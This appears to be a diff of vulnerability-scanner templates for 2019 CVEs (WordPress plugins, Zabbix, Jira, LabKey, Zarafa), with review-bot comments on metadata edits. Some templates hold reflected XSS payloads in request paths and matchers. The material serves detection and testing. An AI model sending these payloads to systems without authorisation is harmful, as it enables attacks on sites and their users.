WordPress Visualizer plugin before 3.3.1 contains a stored cross-site scripting vulnerability via /wp-json/visualizer/v1/update-chart WP-JSON API endpoint. An unauthenticated attacker can execute arbitrary JavaScript when an admin or other privileged user edits the chart via the admin dashboard.
reference:
- https://wpscan.com/vulnerability/867e000d-d2f5-4d53-89b0-41d7d4163f44
- https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf
- https://nvd.nist.gov/vuln/detail/CVE-2019-16931
- https://wpvulndb.com/vulnerabilities/9893
- https://nvd.nist.gov/vuln/detail/CVE-2019-16931
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -44,3 +44,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

View File

@ -7,7 +7,7 @@ info:
description: Zabbix through 4.4 is susceptible to an authentication bypass vulnerability via zabbix.php?action=dashboard.view&dashboardid=1. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.
reference:
- https://www.exploit-db.com/exploits/47467
- https://www.cvedetails.com/cve/CVE-2019-17382/
- https://nvd.nist.gov/vuln/detail/CVE-2019-17382
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1

View File

@ -9,7 +9,6 @@ info:
reference:
- https://atomic111.github.io/article/secudos-domos-directory_traversal
- https://vuldb.com/?id.144804
- https://www.cvedetails.com/cve/CVE-2019-18665
- https://www.secudos.de/news-und-events/aktuelle-news/domos-release-5-6
- https://nvd.nist.gov/vuln/detail/CVE-2019-18665
classification:

View File

@ -1,15 +1,16 @@
id: CVE-2019-19134
info:
name: Hero Maps Premium < 2.2.3 - Unauthenticated Reflected Cross-Site Scripting (XSS)
name: WordPress Hero Maps Premium <=2.2.1 - Cross-Site Scripting
author: daffainfo
severity: medium
description: The Hero Maps Premium plugin 2.2.1 and prior for WordPress is prone to unauthenticated XSS via the views/dashboard/index.php p parameter because it fails to sufficiently sanitize user-supplied input - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
description: WordPress Hero Maps Premium plugin 2.2.1 and prior contains an unauthenticated reflected cross-site scripting vulnerability via the views/dashboard/index.php p parameter.
reference:
- https://wpscan.com/vulnerability/d179f7fe-e3e7-44b3-9bf8-aab2e90dbe01
- https://www.hooperlabs.xyz/disclosures/cve-2019-19134.php
- https://heroplugins.com/product/maps/
- https://heroplugins.com/changelogs/hmaps/changelog.txt
- https://nvd.nist.gov/vuln/detail/CVE-2019-19134
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
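Review bot: The old description embedded the advisory link https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985, and the rewrite drops it without moving it into reference, which only lists a different wpscan entry (d179f7fe-e3e7-44b3-9bf8-aab2e90dbe01). Add the removed link to the reference list if it is still valid. The name also changes the bound from "< 2.2.3" to "<=2.2.1"; that matches the description's "2.2.1 and prior", but it is worth confirming against the changelog reference which release carries the fix.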
@ -37,3 +38,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

View File

@ -1,14 +1,15 @@
id: CVE-2019-19368
info:
name: Rumpus FTP Web File Manager 8.2.9.1 XSS
name: Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting
author: madrobot
severity: medium
description: A Reflected Cross Site Scripting was discovered in the Login page of Rumpus FTP Web File Manager 8.2.9.1. An attacker can exploit it by sending a crafted link to end users and can execute arbitrary Javascripts
description: Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.
reference:
- https://github.com/harshit-shukla/CVE-2019-19368/
- https://www.maxum.com/Rumpus/Download.html
- http://packetstormsecurity.com/files/155719/Rumpus-FTP-Web-File-Manager-8.2.9.1-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-19368
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -29,3 +30,5 @@ requests:
words:
- "value=''><sVg/OnLoAD=alert`1337`//'>"
part: body
# Enhanced by mp on 2022/08/31

View File

@ -1,14 +1,15 @@
id: CVE-2019-19908
info:
name: phpMyChat-Plus - Cross-Site Scripting
name: phpMyChat-Plus 1.98 - Cross-Site Scripting
author: madrobot
severity: medium
description: phpMyChat-Plus 1.98 is vulnerable to reflected cross-site scripting (XSS) via JavaScript injection into the password reset URL. In the URL, the pmc_username parameter to pass_reset.php is vulnerable.
description: phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
reference:
- https://cinzinga.github.io/CVE-2019-19908/
- http://ciprianmp.com/
- https://sourceforge.net/projects/phpmychat/
- https://nvd.nist.gov/vuln/detail/CVE-2019-19908
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -29,3 +30,5 @@ requests:
words:
- "<script>alert(1337)</script>"
part: body
# Enhanced by mp on 2022/08/31

View File

@ -1,14 +1,15 @@
id: CVE-2019-20141
info:
name: Neon Dashboard - Cross-Site Scripting
name: WordPress Laborator Neon Theme 2.0 - Cross-Site Scripting
author: knassar702
severity: medium
description: An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter.
description: WordPress Laborator Neon theme 2.0 contains a cross-site scripting vulnerability via the data/autosuggest-remote.php q parameter.
reference:
- https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html
- https://knassar7o2.blogspot.com/2019/12/neon-dashboard-xss-reflected.html
- https://knassar702.github.io/cve/neon/
- https://nvd.nist.gov/vuln/detail/CVE-2019-20141
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -33,3 +34,5 @@ requests:
words:
- "text/html"
part: header
# Enhanced by mp on 2022/08/31

View File

@ -15,7 +15,7 @@ info:
cvss-score: 7.2
cve-id: CVE-2019-20183
cwe-id: CWE-434
tags: upload,edb,cve,cve2019,rce,intrusive
tags: edb,cve,cve2019,rce,intrusive,fileupload
requests:
- raw:

View File

@ -1,16 +1,16 @@
id: CVE-2019-20210
info:
name: CTHthemes CityBook < 2.3.4 - Reflected XSS
name: WordPress CTHthemes - Cross-Site Scripting
author: edoardottt
severity: medium
description: |
The CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes for WordPress allow Reflected XSS via a search query.
WordPress CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes contain reflected cross-site scripting vulnerabilities via a search query.
reference:
- https://wpscan.com/vulnerability/10013
- https://nvd.nist.gov/vuln/detail/CVE-2019-20210
- https://wpvulndb.com/vulnerabilities/10018
- https://cxsecurity.com/issue/WLB-2019120112
- https://nvd.nist.gov/vuln/detail/CVE-2019-20210
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
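Review bot: The new name "WordPress CTHthemes - Cross-Site Scripting" loses both the affected theme and the version bound that the old name had (CityBook < 2.3.4), leaving only what reads as the vendor. Since the description covers three themes with different fixed versions, a name such as "WordPress CTHthemes CityBook/TownHub/EasyBook - Cross-Site Scripting" keeps the template searchable by product.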
@ -40,3 +40,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

View File

@ -1,13 +1,14 @@
id: CVE-2019-3402
info:
name: Jira - Reflected XSS using searchOwnerUserName parameter.
name: Jira <8.1.1 - Cross-Site Scripting
author: pdteam
severity: medium
description: The ConfigurePortalPages.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the searchOwnerUserName parameter.
description: Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.
reference:
- https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
- https://jira.atlassian.com/browse/JRASERVER-69243
- https://nvd.nist.gov/vuln/detail/CVE-2019-3402
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
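Review bot: The new name and description give the affected range as "before 8.1.1", but the description being replaced states two ranges: before version 7.13.3, and from version 8.0.0 before version 8.1.1. As rewritten, 7.13.3 and later 7.x releases read as vulnerable. Keep both bounds in the description, even if the name stays short.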
@ -31,3 +32,5 @@ requests:
words:
- "<script>alert(1)</script>"
part: body
# Enhanced by mp on 2022/08/31

View File

@ -1,14 +1,13 @@
id: CVE-2019-3911
info:
name: LabKey Server < 18.3.0 - XSS
name: LabKey Server Community Edition <18.3.0 - Cross-Site Scripting
author: princechaddha
severity: medium
description: Reflected cross-site scripting (XSS) vulnerability in LabKey Server Community Edition before 18.3.0-61806.763 allows an unauthenticated remote attacker to inject arbitrary javascript via the onerror
parameter in the /__r2/query endpoints.
description: LabKey Server Community Edition before 18.3.0-61806.763 contains a reflected cross-site scripting vulnerability via the onerror parameter in the /__r2/query endpoints, which allows an unauthenticated remote attacker to inject arbitrary JavaScript.
reference:
- https://www.tenable.com/security/research/tra-2019-03
- https://www.cvedetails.com/cve/CVE-2019-3911
- https://nvd.nist.gov/vuln/detail/CVE-2019-3911
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -38,3 +37,5 @@ requests:
- type: status
status:
- 200
# Enhanced by cs on 2022/09/07

View File

@ -1,14 +1,16 @@
id: CVE-2019-7219
info:
name: Zarafa WebApp Reflected XSS
name: Zarafa WebApp <=2.0.1.47791 - Cross-Site Scripting
author: pdteam
severity: medium
description: |
Unauthenticated reflected cross-site scripting (XSS) exists in Zarafa Webapp 2.0.1.47791 and earlier. NOTE: this is a discontinued product. The issue was fixed in later Zarafa Webapp versions; however, some former Zarafa Webapp customers use the related Kopano product instead.
Zarafa WebApp 2.0.1.47791 and earlier contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
reference:
- https://github.com/verifysecurity/CVE-2019-7219
- https://stash.kopano.io/repos?visibility=public
- https://nvd.nist.gov/vuln/detail/CVE-2019-7219
remediation: This is a discontinued product. The issue was fixed in later versions. However, some former Zarafa WebApp customers use the related Kopano product instead.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
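Review bot: The new remediation field holds product-status text ("This is a discontinued product. The issue was fixed in later versions...") rather than an action the reader can take. Suggest leading with the action, for example upgrading to a fixed Zarafa WebApp version or migrating to the Kopano product the text mentions, and leaving the discontinuation note as the second sentence.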
@ -20,7 +22,6 @@ requests:
- method: GET
path:
- '{{BaseURL}}/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(/xss/)%3E'
matchers-condition: and
matchers:
- type: word
@ -31,7 +32,8 @@ requests:
part: header
words:
- "text/html"
- type: status
status:
- 200
# Enhanced by cs on 2022/09/07

Some files were not shown because too many files have changed in this diff.